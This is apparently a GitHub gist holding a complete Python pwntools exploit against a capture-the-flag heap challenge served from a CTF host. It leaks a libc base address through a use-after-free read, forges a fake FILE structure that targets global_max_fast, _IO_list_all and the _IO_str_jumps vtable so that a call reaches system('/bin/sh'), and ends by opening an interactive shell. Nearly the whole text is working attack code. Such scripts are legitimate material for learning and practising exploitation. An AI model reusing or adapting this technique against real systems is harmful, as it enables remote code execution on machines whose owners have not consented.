@hkraw
Created November 14, 2020 21:03
#!/usr/bin/python3
from pwn import *
from IO_FILE import *
from past.builtins import xrange
from time import sleep
import random
# Util: thin wrappers around the challenge's numbered menu (option 1..4)
def add(size):
    """Menu option 1: ask the service to allocate a chunk of *size* bytes.

    Uses the module-level ``io`` tube; the size is sent as decimal text.
    """
    choice_prompt, size_prompt = 'Choice: ', 'Size: '
    io.sendlineafter(choice_prompt, '1')
    io.sendlineafter(size_prompt, str(size))
def read(idx):
    """Menu option 2: dump slot *idx* and return the raw response.

    Returns everything the service prints up to (and including) the next
    menu banner, so the caller slices the bytes it needs from the result.
    """
    menu_banner = '=== Menu ===>'
    io.sendlineafter('Choice: ', '2')
    io.sendlineafter('Index: ', str(idx))
    response = io.recvuntil(menu_banner)
    return response
def edit(idx, data):
    """Menu option 3: overwrite slot *idx* with *data*.

    *data* is passed to ``io.sendafter`` as-is (no trailing newline is
    added), so the caller controls the exact bytes written.
    """
    for prompt, value in (('Choice: ', '3'), ('Index: ', str(idx))):
        io.sendlineafter(prompt, value)
    io.sendafter('Data: ', data)
def delete(idx):
    """Menu option 4: free slot *idx*."""
    index_text = str(idx)
    io.sendlineafter('Choice: ', '4')
    io.sendlineafter('Index: ', index_text)
# libc 2.27 offsets; every value below is added to libc_base once it is known
# Target library; only its path is used below (for the commented-out LD_PRELOAD run).
libc = ELF('./libc.so.6')
# Offsets relative to the library's load base (see `libc_base + ...` in main).
# They are specific to this libc build; re-derive them for any other binary.
unsorted_bin_addr = 0x3ebca0   # offset the leaked heap pointer is rebased against
global_max_fast = 0x3ed940
system = 0x4f440               # offset of system()
str_binsh = 0x1b3e9a           # presumably the "/bin/sh" string — verify against the libc
_IO_list_all = 0x3ec660
_IO_file_jumps = 0x3e82a0
_IO_str_jumps = _IO_file_jumps+0xc0   # derived from _IO_file_jumps, not measured separately
_IO_str_overflow = _IO_str_jumps+0x18
#Exploit
if __name__ == '__main__':
    # NOTE: `io` is a module global that the helper functions above depend on;
    # it only exists once this branch has run.
    # io = process('./pheappo',env={'LD_PRELOAD':libc.path})
    io = remote('challs.ctf.m0lecon.it',9001)
    add(0x1800) # index 0
    add(0x418) # index 1
    delete(0)
    # Read index 0 back after it was freed; the first 8 bytes are taken as a
    # libc pointer and rebased with unsorted_bin_addr to recover libc_base.
    libc_leak = u64(read(0)[0:8])
    libc_base = libc_leak - unsorted_bin_addr
    print(hex(libc_base))
    # Build the fake FILE payload with the imported IO_FILE helper (its layout
    # is not visible in this file). Every absolute field is libc_base plus
    # one of the offsets defined above.
    IO_file = IO_FILE_plus(arch=64)
    stream = IO_file.construct(
        flags=0, buf_base=0,
        read_end=0, read_base=libc_base+global_max_fast-0x10,
        buf_end=(libc_base+str_binsh-100)//2, write_ptr=(libc_base+str_binsh-100)//2,
        write_base=0,
        lock=libc_base+_IO_list_all+0x8,
        vtable=libc_base+_IO_str_overflow-0x38 )
    stream += p64(libc_base+system) + b'\n'
    # The first 0x10 bytes of the payload are skipped when writing into index 0.
    edit(0,stream[0x10:])
    add(0x1800) # index 2
    delete(2)
    io.interactive()